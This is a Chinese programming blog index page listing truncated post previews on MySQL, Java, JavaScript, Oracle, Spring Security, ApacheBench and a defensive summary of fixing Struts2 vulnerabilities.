      今天遇到一个客户BUG,当前的jdbc连接用户是root,然后部分删除操作都会报下面这个错误:The user specified as a definer ('aaa'@'localhost') does not exist 最后找原因发现删除操作做了触发器,而触发器里面有这样一句 /*!50017 DEFINER = ''aaa@'localhost' */  原来最初
    • javascript中showModelDialog刷新父页面 bozch JavaScript刷新父页面showModalDialog
      在页面中使用showModalDialog打开模式子页面窗口的时候,如果想在子页面中操作父页面中的某个节点,可以通过如下的进行:       window.showModalDialog('url',self,‘status...’); // 首先中间参数使用self       在子页面使用w
    • 编程之美-买书折扣 bylijinnan 编程之美
      import java.util.Arrays; public class BookDiscount { /**编程之美 买书折扣 书上的贪心算法的分析很有意思,我看了半天看不懂,结果作者说,贪心算法在这个问题上是不适用的。。 下面用动态规划实现。 哈利波特这本书一共有五卷,每卷都是8欧元,如果读者一次购买不同的两卷可扣除5%的折扣,三卷10%,四卷20%,五卷
    • 关于struts2.3.4项目跨站执行脚本以及远程执行漏洞修复概要 chenbowen00 strutsWEB安全
      因为近期负责的几个银行系统软件,需要交付客户,因此客户专门请了安全公司对系统进行了安全评测,结果发现了诸如跨站执行脚本,远程执行漏洞以及弱口令等问题。 下面记录下本次解决的过程以便后续 1、首先从最简单的开始处理,服务器的弱口令问题,首先根据安全工具提供的测试描述中发现应用服务器中存在一个匿名用户,默认是不需要密码的,经过分析发现服务器使用了FTP协议, 而使用ftp协议默认会产生一个匿名用
    • [电力与暖气]煤炭燃烧与电力加温 comsci
            在宇宙中,用贝塔射线观测地球某个部分,看上去,好像一个个马蜂窝,又像珊瑚礁一样,原来是某个国家的采煤区.....       不过,这个采煤区的煤炭看来是要用完了.....那么依赖将起燃烧并取暖的城市,在极度严寒的季节中...该怎么办呢?   &nbs
    • oracle O7_DICTIONARY_ACCESSIBILITY参数 daizj oracle
      O7_DICTIONARY_ACCESSIBILITY参数控制对数据字典的访问.设置为true,如果用户被授予了如select any table等any table权限,用户即使不是dba或sysdba用户也可以访问数据字典.在9i及以上版本默认为false,8i及以前版本默认为true.如果设置为true就可能会带来安全上的一些问题.这也就为什么O7_DICTIONARY_ACCESSIBIL
    • 比较全面的MySQL优化参考 dengkane mysql
      本文整理了一些MySQL的通用优化方法,做个简单的总结分享,旨在帮助那些没有专职MySQL DBA的企业做好基本的优化工作,至于具体的SQL优化,大部分通过加适当的索引即可达到效果,更复杂的就需要具体分析了,可以参考本站的一些优化案例或者联系我,下方有我的联系方式。这是上篇。   1、硬件层相关优化   1.1、CPU相关   在服务器的BIOS设置中,可
    • C语言homework2,有一个逆序打印数字的小算法 dcj3sjt126com c
      #h1#   0、完成课堂例子 1、将一个四位数逆序打印 1234 ==> 4321 实现方法一: # include <stdio.h> int main(void) { int i = 1234; int one = i%10; int two = i / 10 % 10; int three = i / 100 % 10;
    • apacheBench对网站进行压力测试 dcj3sjt126com apachebench
         ab 的全称是 ApacheBench , 是 Apache 附带的一个小工具 , 专门用于 HTTP Server 的 benchmark testing , 可以同时模拟多个并发请求。前段时间看到公司的开发人员也在用它作一些测试,看起来也不错,很简单,也很容易使用,所以今天花一点时间看了一下。 通过下面的一个简单的例子和注释,相信大家可以更容易理解这个工具的使用。
    • 2种办法让HashMap线程安全 flyfoxs javajdkjni
      多线程之--2种办法让HashMap线程安全 多线程之--synchronized 和reentrantlock的优缺点 多线程之--2种JAVA乐观锁的比较( NonfairSync VS. FairSync)     HashMap不是线程安全的,往往在写程序时需要通过一些方法来回避.其实JDK原生的提供了2种方法让HashMap支持线程安全.  
    • Spring Security(04)——认证简介 234390216 Spring Security认证过程
      认证简介 目录 1.1     认证过程 1.2     Web应用的认证过程 1.2.1    ExceptionTranslationFilter 1.2.2    在request之间共享SecurityContext   1
    • Java 位运算 Javahuhui java位运算
      // 左移( << ) 低位补0 // 0000 0000 0000 0000 0000 0000 0000 0110 然后左移2位后,低位补0: // 0000 0000 0000 0000 0000 0000 0001 1000 System.out.println(6 << 2);// 运行结果是24 // 右移( >> ) 高位补"
    • mysql免安装版配置 ldzyz007 mysql
      1、my-small.ini是为了小型数据库而设计的。不应该把这个模型用于含有一些常用项目的数据库。 2、my-medium.ini是为中等规模的数据库而设计的。如果你正在企业中使用RHEL,可能会比这个操作系统的最小RAM需求(256MB)明显多得多的物理内存。由此可见,如果有那么多RAM内存可以使用,自然可以在同一台机器上运行其它服务。 3、my-large.ini是为专用于一个SQL数据
    • MFC和ado数据库使用时遇到的问题 你不认识的休道人 sqlC++mfc
      =================================================================== 第一个 =================================================================== try{ CString sql; sql.Format("select * from p
    • 表单重复提交Double Submits rensanning double
      可能发生的场景: *多次点击提交按钮 *刷新页面 *点击浏览器回退按钮 *直接访问收藏夹中的地址 *重复发送HTTP请求(Ajax) (1)点击按钮后disable该按钮一会儿,这样能避免急躁的用户频繁点击按钮。 这种方法确实有些粗暴,友好一点的可以把按钮的文字变一下做个提示,比如Bootstrap的做法: http://getbootstrap.co
    • Java String 十大常见问题 tomcat_oracle java正则表达式
       1.字符串比较,使用“==”还是equals()?   "=="判断两个引用的是不是同一个内存地址(同一个物理对象)。   equals()判断两个字符串的值是否相等。   除非你想判断两个string引用是否同一个对象,否则应该总是使用equals()方法。   如果你了解字符串的驻留(String Interning)则会更好地理解这个问题。    
    • SpringMVC 登陆拦截器实现登陆控制 xp9802 springMVC
      思路,先登陆后,将登陆信息存储在session中,然后通过拦截器,对系统中的页面和资源进行访问拦截,同时对于登陆本身相关的页面和资源不拦截。   实现方法: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
    按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他